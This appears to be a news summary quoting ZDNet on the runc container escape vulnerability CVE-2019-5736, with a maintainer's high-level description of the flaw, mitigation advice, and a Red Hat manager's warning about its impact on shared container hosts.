An anonymous reader quotes a report from ZDNet: One of the great security fears about containers is that an attacker could infect a container with a malicious program, which could escape and attack the host system. Well, we now have a security hole that could be used for such an attack: the runc container breakout, CVE-2019-5736. runc is the underlying container runtime for Docker, Kubernetes, and other container-dependent programs. It's an open-source command-line tool for spawning and running containers. Docker originally created it; today it is maintained under the Open Container Initiative (OCI) as the reference implementation of the OCI runtime specification. It's widely used. Chances are, if you're using containers, you're running them on runc. According to Aleksa Sarai, a SUSE container senior software engineer and a runc maintainer, security researchers Adam Iwaniuk and Borys Popławski discovered a vulnerability which "allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command (it doesn't matter if the command is not attacker-controlled) as root." To do this, an attacker has to place a malicious container within your system. But this is not that difficult. Lazy sysadmins often use the first container that comes to hand without checking to see if the software within that container is what it purports to be. Since the precondition is running something as root inside the container, correct use of user namespaces (where host root is not mapped into the container) blocks the overwrite, and running containers under a non-root user removes the foothold it needs; neither substitutes for updating runc. Red Hat technical product manager for containers, Scott McCarty, warned: "The disclosure of a security flaw (CVE-2019-5736) in runc and docker illustrates a bad scenario for many IT administrators, managers, and CxOs. Containers represent a move back toward shared systems where applications from many different users all run on the same Linux host. 
Exploiting this vulnerability means that malicious code could potentially break containment, impacting not just a single container, but the entire container host, ultimately compromising the hundreds-to-thousands of other containers running on it. While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies...and that's exactly what this vulnerability represents."